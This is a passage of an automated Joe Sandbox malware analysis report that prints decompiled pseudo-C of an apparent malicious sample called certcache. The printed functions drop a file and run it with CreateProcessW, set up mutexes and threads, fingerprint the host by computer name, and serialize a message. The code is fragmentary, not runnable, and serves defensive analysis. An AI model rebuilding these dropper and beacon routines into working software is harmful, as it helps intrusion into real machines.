					_push( *((intOrPtr*)(_t26 - 0x14)));
					CloseHandle();
				}
				HeapFree(GetProcessHeap(), 0, _t22);
				return 0;
			}

0x001aa658
0x001aa65f
0x001aa66d
0x001aa676
0x001aa6a2
0x001aa6a7
0x001aa6ad
0x001aa6b0
0x001aa6b0
0x001aa6c0
0x001aa6ce

APIs

WriteFile.KERNEL32 ref: 001AA658
CloseHandle.KERNEL32 ref: 001AA65F
memset.NTDLL ref: 001AA66D
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 001AA69A
CloseHandle.KERNEL32(?), ref: 001AA6A7
CloseHandle.KERNEL32(?), ref: 001AA6B0
GetProcessHeap.KERNEL32(00000000), ref: 001AA6B9
HeapFree.KERNEL32(00000000), ref: 001AA6C0

Strings

D, xrefs: 001AA676

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001AA6E0, Relevance: 15.1, APIs: 10, Instructions: 65
thread

C-Code - Quality: 100%

			E001AA6E0(void* __ecx) {
				void* _t15;
				void* _t22;
				void _t25;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t33;

				_t31 = __ecx;
				_t15 = RtlAllocateHeap(GetProcessHeap(), 8,  *((intOrPtr*)(__ecx + 0xc)) + 0x10);
				_t33 = _t15;
				if(_t33 == 0) {
					return _t15;
				} else {
					 *_t33 =  *_t31;
					 *((intOrPtr*)(_t33 + 4)) =  *((intOrPtr*)(_t31 + 4));
					_t4 = _t33 + 0x10; // 0x10
					_t29 = _t4;
					 *(_t33 + 8) = _t29;
					 *(_t33 + 0xc) =  *(_t31 + 0xc);
					memcpy(_t29,  *(_t31 + 8),  *(_t31 + 0xc));
					_t32 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
					if(_t32 == 0) {
						L5:
						return HeapFree(GetProcessHeap(), 0, _t33);
					}
					 *(_t32 + 4) =  *_t33;
					_t22 = CreateThread(0, 0, 0x1aa3f0, _t33, 0, 0);
					 *(_t32 + 8) = _t22;
					if(_t22 == 0) {
						HeapFree(GetProcessHeap(), 0, _t32);
						goto L5;
					}
					_t25 =  *0x1acbd4; // 0x0
					 *_t32 = _t25;
					 *0x1acbd4 = _t32;
					return _t25;
				}
			}

0x001aa6e2
0x001aa6f4
0x001aa6fa
0x001aa6fe
0x001aa793
0x001aa704
0x001aa706
0x001aa70b
0x001aa70e
0x001aa70e
0x001aa711
0x001aa717
0x001aa721
0x001aa73b
0x001aa73f
0x001aa781
0x00000000
0x001aa78b
0x001aa751
0x001aa754
0x001aa75a
0x001aa75f
0x001aa77b
0x00000000
0x001aa77b
0x001aa761
0x001aa766
0x001aa768
0x001aa770
0x001aa770

APIs

GetProcessHeap.KERNEL32(00000008,?), ref: 001AA6ED
RtlAllocateHeap.NTDLL(00000000), ref: 001AA6F4
memcpy.NTDLL(00000010,?,?), ref: 001AA721
GetProcessHeap.KERNEL32(00000008,0000000C), ref: 001AA72E
RtlAllocateHeap.NTDLL(00000000), ref: 001AA735
CreateThread.KERNEL32(00000000,00000000,Function_0000A3F0,00000000,00000000,00000000), ref: 001AA754
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001AA774
HeapFree.KERNEL32(00000000), ref: 001AA77B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001AA784
HeapFree.KERNEL32(00000000), ref: 001AA78B

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001A91F0, Relevance: 15.1, APIs: 10, Instructions: 64time

APIs

CreateEventW.KERNEL32 ref: 001A91F0
SignalObjectAndWait.KERNEL32(00000000,000000FF,00000000), ref: 001A920A
ResetEvent.KERNEL32 ref: 001A9221
ReleaseMutex.KERNEL32 ref: 001A922A
CloseHandle.KERNEL32 ref: 001A9231
GetTickCount.KERNEL32 ref: 001A923B
CreateTimerQueueTimer.KERNEL32(?,00000000,Function_00008E20,00000000,00001388,000003E8,00000010), ref: 001A926E
WaitForSingleObject.KERNEL32(000000FF), ref: 001A9280
DeleteTimerQueueTimer.KERNEL32(00000000,?,000000FF), ref: 001A928D
CloseHandle.KERNEL32 ref: 001A9299

Part of subcall function 001AA7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 001AA7B8
Part of subcall function 001AA7A0: CloseHandle.KERNEL32(?), ref: 001AA7CC
Part of subcall function 001AA7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,001A8F95), ref: 001AA7D5
Part of subcall function 001AA7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 001AA7DC

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001AA515, Relevance: 15.0, APIs: 10, Instructions: 50
file

C-Code - Quality: 26%

			E001AA515(void* __edi, void* __eflags) {
				void* _t32;
				void* _t34;
				void* _t35;
				void* _t37;

				_t32 = __edi;
				WriteFile(??, ??, ??, ??, ??);
				CloseHandle(_t34);
				L001A1830(0x1a1398, 4);
				_t35 =  *(_t37 - 4);
				 *0x1ac20c(_t37 - 0x528, 0x104, _t35, _t37 - 0x320, 0x6e15c1da, _t37 - 4);
				HeapFree(GetProcessHeap(), 0, _t35);
				_push(_t37 - 0x18);
				_push( *((intOrPtr*)(_t37 + 8)));
				if(L001A21B0(_t37 - 0x528, _t32) != 0) {
					CloseHandle( *(_t37 - 0x18));
					CloseHandle( *(_t37 - 0x14));
				}
				_push( *((intOrPtr*)(_t37 + 8)));
				CloseHandle();
				HeapFree(GetProcessHeap(), 0, _t32);
				return 0;
			}

0x001aa515
0x001aa515
0x001aa51c
0x001aa535
0x001aa53a
0x001aa551
0x001aa564
0x001aa56d
0x001aa56e
0x001aa581
0x001aa586
0x001aa58f
0x001aa58f
0x001aa595
0x001aa6b0
0x001aa6c0
0x001aa6ce

APIs

WriteFile.KERNEL32 ref: 001AA515
CloseHandle.KERNEL32 ref: 001AA51C
_snwprintf.NTDLL ref: 001AA551
GetProcessHeap.KERNEL32(00000000,?), ref: 001AA55D
HeapFree.KERNEL32(00000000), ref: 001AA564
CloseHandle.KERNEL32(?), ref: 001AA586
CloseHandle.KERNEL32(?), ref: 001AA58F
CloseHandle.KERNEL32(?), ref: 001AA6B0
GetProcessHeap.KERNEL32(00000000), ref: 001AA6B9
HeapFree.KERNEL32(00000000), ref: 001AA6C0

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001A8BFA, Relevance: 12.1, APIs: 8, Instructions: 91string

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 001A8C28
lstrlenW.KERNEL32(?), ref: 001A8C35
lstrlenW.KERNEL32(00000004), ref: 001A8C84
GetProcessHeap.KERNEL32(00000008,00000000), ref: 001A8CA0
RtlAllocateHeap.NTDLL(00000000), ref: 001A8CA7
lstrcmpiW.KERNEL32(00000004,?), ref: 001A8CC5
lstrcpyW.KERNEL32(00000000,00000004), ref: 001A8CDA
lstrlenW.KERNEL32(00000004), ref: 001A8CE4

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001AA402, Relevance: 12.1, APIs: 8, Instructions: 76

APIs

WTSGetActiveConsoleSessionId.KERNEL32 ref: 001AA420
GetTickCount.KERNEL32 ref: 001AA5BB
_snwprintf.NTDLL ref: 001AA60E
GetProcessHeap.KERNEL32(00000000,?), ref: 001AA61A
HeapFree.KERNEL32(00000000), ref: 001AA621
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 001AA640
GetProcessHeap.KERNEL32(00000000), ref: 001AA6B9
HeapFree.KERNEL32(00000000), ref: 001AA6C0

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001AA46E, Relevance: 12.1, APIs: 8, Instructions: 58

C-Code - Quality: 26%

			E001AA46E(void* __edi, void* __eflags) {
				signed int _t22;
				void* _t28;
				void* _t59;
				void* _t63;
				void* _t64;
				void* _t66;
				void* _t67;

				_t59 = __edi;
				 *0x1ac214();
				_t22 = GetTickCount();
				_t2 = (_t22 & 0x00000007) + 1; // 0x1
				L001A2270(_t67 - 0x98, _t2);
				 *((short*)(_t67 + (_t22 & 0x00000007) * 2 - 0x96)) = 0;
				L001A1830(0x1a15a4, 0xc);
				_t63 =  *(_t67 - 4);
				_t28 = _t67 - 0x320;
				 *0x1ac20c(_t28, 0x104, _t63, _t28, _t67 - 0x98, 0x6e15c1da, _t67 - 4);
				HeapFree(GetProcessHeap(), 0, _t63);
				_t64 = CreateFileW(_t67 - 0x320, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t64 != 0xffffffff) {
					goto 0x1b1e83;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					WriteFile();
					CloseHandle(_t64);
					L001A1830(0x1a1398, 4);
					_t66 =  *(_t67 - 4);
					 *0x1ac20c(_t67 - 0x528, 0x104, _t66, _t67 - 0x320, 0x6e15c1da, _t67 - 4);
					HeapFree(GetProcessHeap(), 0, _t66);
					_push(_t67 - 0x18);
					_push( *((intOrPtr*)(_t67 + 8)));
					if(L001A21B0(_t67 - 0x528, _t59) != 0) {
						CloseHandle( *(_t67 - 0x18));
						CloseHandle( *(_t67 - 0x14));
					}
				}
				_push( *((intOrPtr*)(_t67 + 8)));
				CloseHandle();
				HeapFree(GetProcessHeap(), 0, _t59);
				return 0;
			}

0x001aa46e
0x001aa46e
0x001aa474
0x001aa485
0x001aa488
0x001aa494
0x001aa4aa
0x001aa4af
0x001aa4b9
0x001aa4c7
0x001aa4da
0x001aa4ff
0x001aa504
0x001aa50a
0x001aa50f
0x001aa510
0x001aa511
0x001aa512
0x001aa513
0x001aa514
0x001aa515
0x001aa51c
0x001aa535
0x001aa53a
0x001aa551
0x001aa564
0x001aa56d
0x001aa56e
0x001aa581
0x001aa586
0x001aa58f
0x001aa58f
0x001aa581
0x001aa595
0x001aa6b0
0x001aa6c0
0x001aa6ce

APIs

GetTickCount.KERNEL32 ref: 001AA474
_snwprintf.NTDLL ref: 001AA4C7
GetProcessHeap.KERNEL32(00000000,?), ref: 001AA4D3
HeapFree.KERNEL32(00000000), ref: 001AA4DA
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 001AA4F9
CloseHandle.KERNEL32(?), ref: 001AA6B0
GetProcessHeap.KERNEL32(00000000), ref: 001AA6B9
HeapFree.KERNEL32(00000000), ref: 001AA6C0

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001A9150, Relevance: 10.6, APIs: 7, Instructions: 60

APIs

_snwprintf.NTDLL ref: 001A9168
GetProcessHeap.KERNEL32(00000000,?), ref: 001A9174
HeapFree.KERNEL32(00000000), ref: 001A917B
_snwprintf.NTDLL ref: 001A91AC
GetProcessHeap.KERNEL32(00000000,?), ref: 001A91B8
HeapFree.KERNEL32(00000000), ref: 001A91BF
CreateMutexW.KERNEL32(00000000,00000000,?), ref: 001A91D0

Part of subcall function 001AA7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 001AA7B8
Part of subcall function 001AA7A0: CloseHandle.KERNEL32(?), ref: 001AA7CC
Part of subcall function 001AA7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,001A8F95), ref: 001AA7D5
Part of subcall function 001AA7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 001AA7DC

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001A85E1, Relevance: 10.5, APIs: 7, Instructions: 45

C-Code - Quality: 20%

			E001A85E1(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __eflags) {
				signed char* _t28;
				void* _t30;
				void _t49;
				intOrPtr _t52;
				void* _t53;
				signed char* _t56;
				void* _t58;
				intOrPtr* _t64;
				void* _t66;
				void* _t67;
				void* _t69;

				_t64 = __edi;
				_t53 = __ebx;
				L001A1830(__ecx, __edx);
				_t56 =  *0x1ac298; // 0x0
				_t66 =  *(_t69 + 8);
				 *0x1ac20c(_t69 - 0xb8, 0x40, _t66, _t56[3] & 0x000000ff, _t56[2] & 0x000000ff, _t56[1] & 0x000000ff,  *_t56 & 0x000000ff);
				HeapFree(GetProcessHeap(), 0, _t66);
				_t28 =  *0x1ac298; // 0x0
				_t61 = _t69 - 0xb8;
				_push(_t56);
				_t57 = _t69 - 0x38;
				_push(_t28[4] & 0x0000ffff);
				_t30 = L001A1C50(_t69 - 0x38, _t69 - 0xb8, _t64);
				_t67 =  *(_t69 - 8);
				if(_t30 != 0) {
					goto 0x1b165c;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					if(L001A1D40(_t57) != 0) {
						goto 0x1b1674;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						if(L001A1E80(_t41, _t57, _t61) != 0) {
							goto 0x1b168c;
							asm("int3");
							asm("int3");
							if(L001A2560(_t61, _t64) != 0) {
								_t58 =  *(_t69 - 0x10);
								_t49 =  *_t58;
								 *_t53 = _t49;
								if(_t49 < 0x4000000) {
									_push(_t53);
									_t52 = L001A8500(_t58 + 4,  *((intOrPtr*)(_t69 - 0xc)) - 4, _t64);
									_t58 =  *(_t69 - 0x10);
									 *_t64 = _t52;
								}
								HeapFree(GetProcessHeap(), 0, _t58);
							}
							HeapFree(GetProcessHeap(), ??, ??);
						}
						 *0x1ac260( *((intOrPtr*)(_t69 - 0x30)));
					}
					 *0x1ac260( *((intOrPtr*)(_t69 - 0x34)));
					 *0x1ac260( *((intOrPtr*)(_t69 - 0x38)));
				}
				HeapFree(GetProcessHeap(), 0, 0);
				HeapFree(GetProcessHeap(), 0, _t67);
				HeapFree(GetProcessHeap(), ??, ??);
				HeapFree(GetProcessHeap(), ??, ??);
				return 0 |  *_t64 != 0x00000000;
			}

0x001a85e1
0x001a85e1
0x001a85e1
0x001a85e6
0x001a85ec
0x001a860c
0x001a861f
0x001a8625
0x001a862a
0x001a8630
0x001a8631
0x001a8638
0x001a8639
0x001a863e
0x001a8646
0x001a864c
0x001a8651
0x001a8652
0x001a8653
0x001a8654
0x001a8655
0x001a8660
0x001a8662
0x001a8667
0x001a8668
0x001a8669
0x001a866a
0x001a866b
0x001a8676
0x001a8678
0x001a867d
0x001a867e
0x001a8689
0x001a868b
0x001a868e
0x001a8690
0x001a8697
0x001a869f
0x001a86a3
0x001a86a8
0x001a86ae
0x001a86ae
0x001a86ba
0x001a86ba
0x001a86cc
0x001a86cc
0x001a86d5
0x001a86d5
0x001a86de
0x001a86e7
0x001a86e7
0x001a86f8
0x001a8708
0x001a871a
0x001a872c
0x001a873f

APIs

_snwprintf.NTDLL ref: 001A860C
GetProcessHeap.KERNEL32(00000000,?), ref: 001A8618
HeapFree.KERNEL32(00000000), ref: 001A861F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001A86F1
HeapFree.KERNEL32(00000000), ref: 001A86F8
GetProcessHeap.KERNEL32(00000000,?), ref: 001A8701
HeapFree.KERNEL32(00000000), ref: 001A8708

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001A9569, Relevance: 10.5, APIs: 7, Instructions: 31
file

C-Code - Quality: 34%

			E001A9569(signed short __edx, void* __edi, void* __esi) {
				int _t13;
				signed int _t20;
				void* _t24;
				signed short* _t26;
				signed short _t27;
				void* _t28;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t32;

				_t29 = __esi;
				_t28 = __edi;
				_t27 = __edx;
				_t24 = MapViewOfFile(??, ??, ??, ??, ??);
				if(_t24 != 0) {
					 *0x1acbd0 = RtlComputeCrc32(0, _t24, GetFileSize(__esi, 0));
					UnmapViewOfFile(_t24);
				}
				CloseHandle(_t28);
				CloseHandle(_t29);
				 *(_t31 - 8) = 0x10;
				_t13 = GetComputerNameW(_t31 - 0x28, _t31 - 8);
				if(_t13 != 0) {
					_t26 = _t31 - 0x28;
					if( *(_t31 - 0x28) != 0) {
						goto 0x1b19f0;
						asm("int3");
						do {
							_t20 =  *_t26 & 0x0000ffff;
							if(_t20 < 0x30 || _t20 > 0x39) {
								if(_t20 < 0x61 || _t20 > 0x7a) {
									if(_t20 < 0x41 || _t20 > 0x5a) {
										 *_t26 = _t27;
									}
								}
							}
							_t26 =  &(_t26[1]);
						} while ( *_t26 != 0);
					}
					_t30 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
					if(_t30 == 0) {
						_t30 =  *(_t31 - 8);
					} else {
						goto 0x1b1a04;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("cmpsb");
						asm("int3");
						E001A1790(_t26, _t27);
						_t32 = _t32 + 8;
					}
					 *0x1ac1f8(0x1ac2a8, 0x104, _t30, _t31 - 0x28,  *0x1ac3ac);
					_t13 = HeapFree(GetProcessHeap(), 0, _t30);
				}
				goto 0x1b1a1e;
				return _t13;
			}

0x001a9569
0x001a9569
0x001a9569
0x001a956f
0x001a9573
0x001a9589
0x001a958e
0x001a958e
0x001a9595
0x001a959c
0x001a95a5
0x001a95b1
0x001a95ba
0x001a95c5
0x001a95c8
0x001a95ca
0x001a95cf
0x001a95d0
0x001a95d0
0x001a95d6
0x001a95e0
0x001a95ea
0x001a95f1
0x001a95f1
0x001a95ea
0x001a95e0
0x001a95f4
0x001a95f7
0x001a95d0
0x001a960e
0x001a9612
0x001a962a
0x001a9614
0x001a9614
0x001a9619
0x001a961a
0x001a961b
0x001a961c
0x001a961d
0x001a961e
0x001a961f
0x001a9620
0x001a9625
0x001a9625
0x001a9642
0x001a9655
0x001a9655
0x001a965b
0x001a9660

APIs

MapViewOfFile.KERNEL32 ref: 001A9569
GetFileSize.KERNEL32(?,00000000), ref: 001A9578
RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 001A9582
UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 001A958E
CloseHandle.KERNEL32 ref: 001A9595
CloseHandle.KERNEL32 ref: 001A959C
GetComputerNameW.KERNEL32(?,?), ref: 001A95B1
GetProcessHeap.KERNEL32(00000008,0000000C), ref: 001A9601
RtlAllocateHeap.NTDLL(00000000), ref: 001A9608
_snprintf.NTDLL ref: 001A9642
GetProcessHeap.KERNEL32(00000000,00000010), ref: 001A964E
HeapFree.KERNEL32(00000000), ref: 001A9655

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001AA037, Relevance: 9.2, APIs: 6, Instructions: 161

C-Code - Quality: 100%

			E001AA037(unsigned int __eax, void* __ebx, void* __ecx, void* __edx, signed char* __edi) {
				unsigned int _t31;
				unsigned int _t32;
				long _t41;
				signed char _t52;
				signed char _t54;
				signed char _t56;
				signed char _t58;
				signed char _t60;
				void* _t62;
				intOrPtr* _t63;
				int _t65;
				int _t66;
				int _t67;
				void* _t68;
				signed char _t69;
				signed char _t71;
				signed char _t73;
				signed char _t75;
				signed char _t77;
				void* _t79;
				void* _t80;
				void* _t81;
				void* _t82;
				int _t83;
				signed char* _t84;
				void* _t86;
				char* _t89;
				signed char* _t91;
				signed char* _t92;
				void* _t93;
				char* _t94;
				signed char* _t95;
				void* _t96;
				char* _t97;
				signed char* _t98;
				void* _t99;
				char* _t100;
				signed char* _t101;
				void* _t103;

				_t84 = __edi;
				_t79 = __edx;
				_t68 = __ecx;
				_t62 = __ebx;
				_t31 = __eax;
				if(__eax > 0x7f) {
					do {
						_t31 = _t31 >> 7;
						_t62 = _t62 + 1;
					} while (_t31 > 0x7f);
				}
				_t32 = _t84[0x28];
				 *((intOrPtr*)(_t103 - 4)) = 1;
				while(_t32 > 0x7f) {
					 *((intOrPtr*)(_t103 - 4)) =  *((intOrPtr*)(_t103 - 4)) + 1;
					_t32 = _t32 >> 7;
				}
				_t63 =  *((intOrPtr*)(_t103 - 0xc));
				_t41 = _t84[0x28] + _t84[0x20] + _t84[0x18] + _t84[8] +  *((intOrPtr*)(_t103 - 4)) + _t62 + _t79 + _t68 +  *((intOrPtr*)(_t103 - 8)) + 0xf;
				 *(_t63 + 4) = _t41;
				_t89 = RtlAllocateHeap(GetProcessHeap(), 0, _t41);
				 *_t63 = _t89;
				if(_t89 != 0) {
					 *_t89 = 8;
					_t91 = _t89 + 1;
					_t69 =  *_t84;
					while(_t69 > 0x7f) {
						_t60 = _t69;
						_t69 = _t69 >> 7;
						 *_t91 = _t60 | 0x00000080;
						_t91 =  &(_t91[1]);
					}
					 *_t91 = _t69 & 0x0000007f;
					_t91[1] = 0x12;
					_t92 =  &(_t91[2]);
					_t65 = _t84[8];
					_t71 = _t65;
					_t80 = _t84[4];
					if(_t65 > 0x7f) {
						do {
							_t58 = _t71;
							_t71 = _t71 >> 7;
							 *_t92 = _t58 | 0x00000080;
							_t92 =  &(_t92[1]);
						} while (_t71 > 0x7f);
					}
					 *_t92 = _t71 & 0x0000007f;
					_t93 =  &(_t92[1]);
					memcpy(_t93, _t80, _t65);
					_t94 = _t93 + _t65;
					 *_t94 = 0x1d;
					 *(_t94 + 1) = _t84[0xc];
					 *((char*)(_t94 + 5)) = 0x25;
					 *(_t94 + 6) = _t84[0x10];
					 *((char*)(_t94 + 0xa)) = 0x2a;
					_t95 = _t94 + 0xb;
					_t66 = _t84[0x18];
					_t73 = _t66;
					_t81 = _t84[0x14];
					if(_t66 > 0x7f) {
						do {
							_t56 = _t73;
							_t73 = _t73 >> 7;
							 *_t95 = _t56 | 0x00000080;
							_t95 =  &(_t95[1]);
						} while (_t73 > 0x7f);
					}
					 *_t95 = _t73 & 0x0000007f;
					_t96 =  &(_t95[1]);
					memcpy(_t96, _t81, _t66);
					_t97 = _t96 + _t66;
					 *_t97 = 0x32;
					_t98 = _t97 + 1;
					_t67 = _t84[0x20];
					_t75 = _t67;
					_t82 = _t84[0x1c];
					if(_t67 > 0x7f) {
						do {
							_t54 = _t75;
							_t75 = _t75 >> 7;
							 *_t98 = _t54 | 0x00000080;
							_t98 =  &(_t98[1]);
						} while (_t75 > 0x7f);
					}
					 *_t98 = _t75 & 0x0000007f;
					_t99 =  &(_t98[1]);
					memcpy(_t99, _t82, _t67);
					_t100 = _t99 + _t67;
					 *_t100 = 0x3a;
					_t101 = _t100 + 1;
					_t83 = _t84[0x28];
					_t77 = _t83;
					_t86 = _t84[0x24];
					if(_t83 > 0x7f) {
						do {
							_t52 = _t77;
							_t77 = _t77 >> 7;
							 *_t101 = _t52 | 0x00000080;
							_t101 =  &(_t101[1]);
						} while (_t77 > 0x7f);
					}
					 *_t101 = _t77 & 0x0000007f;
					memcpy( &(_t101[1]), _t86, _t83);
					_t63 =  *((intOrPtr*)(_t103 - 0xc));
				}
				return 0 |  *_t63 != 0x00000000;
			}

0x001aa037
0x001aa037
0x001aa037
0x001aa037
0x001aa037
0x001aa03a
0x001aa040
0x001aa040
0x001aa043
0x001aa044
0x001aa040
0x001aa049
0x001aa04c
0x001aa056
0x001aa060
0x001aa063
0x001aa066
0x001aa07f
0x001aa089
0x001aa08e
0x001aa09e
0x001aa0a0
0x001aa0a4
0x001aa0aa
0x001aa0ad
0x001aa0ae
0x001aa0b3
0x001aa0b5
0x001aa0b7
0x001aa0bc
0x001aa0be
0x001aa0bf
0x001aa0c7
0x001aa0c9
0x001aa0cd
0x001aa0d0
0x001aa0d3
0x001aa0d5
0x001aa0db
0x001aa0e0
0x001aa0e0
0x001aa0e2
0x001aa0e7
0x001aa0e9
0x001aa0ea
0x001aa0e0
0x001aa0f3
0x001aa0f5
0x001aa0f8
0x001aa0fe
0x001aa103
0x001aa109
0x001aa10c
0x001aa113
0x001aa116
0x001aa11a
0x001aa11d
0x001aa120
0x001aa122
0x001aa128
0x001aa130
0x001aa130
0x001aa132
0x001aa137
0x001aa139
0x001aa13a
0x001aa130
0x001aa143
0x001aa145
0x001aa148
0x001aa14e
0x001aa153
0x001aa156
0x001aa157
0x001aa15a
0x001aa15c
0x001aa162
0x001aa164
0x001aa164
0x001aa166
0x001aa16b
0x001aa16d
0x001aa16e
0x001aa164
0x001aa177
0x001aa179
0x001aa17c
0x001aa182
0x001aa187
0x001aa18a
0x001aa18b
0x001aa18e
0x001aa190
0x001aa196
0x001aa198
0x001aa198
0x001aa19a
0x001aa19f
0x001aa1a1
0x001aa1a2
0x001aa198
0x001aa1ab
0x001aa1b0
0x001aa1b6
0x001aa1b9
0x001aa1c9

APIs

GetProcessHeap.KERNEL32(00000000,00000001), ref: 001AA091
RtlAllocateHeap.NTDLL(00000000), ref: 001AA098
memcpy.NTDLL(00000000,00000001,?), ref: 001AA0F8
memcpy.NTDLL(-0000000A,?,?), ref: 001AA148
memcpy.NTDLL(-00000008,?,?), ref: 001AA17C
memcpy.NTDLL(-00000006,?,?), ref: 001AA1B0

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

Function 001A90BE, Relevance: 9.1, APIs: 6, Instructions: 57

APIs

memset.NTDLL ref: 001A90C6
_snwprintf.NTDLL ref: 001A90F5
GetProcessHeap.KERNEL32(00000000,?), ref: 001A9100
HeapFree.KERNEL32(00000000), ref: 001A9107
CreateMutexW.KERNEL32(00000000,00000000,?), ref: 001A9116
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001A9128

Part of subcall function 001AA7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 001AA7B8
Part of subcall function 001AA7A0: CloseHandle.KERNEL32(?), ref: 001AA7CC
Part of subcall function 001AA7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,001A8F95), ref: 001AA7D5
Part of subcall function 001AA7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 001AA7DC

Memory Dump Source

Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

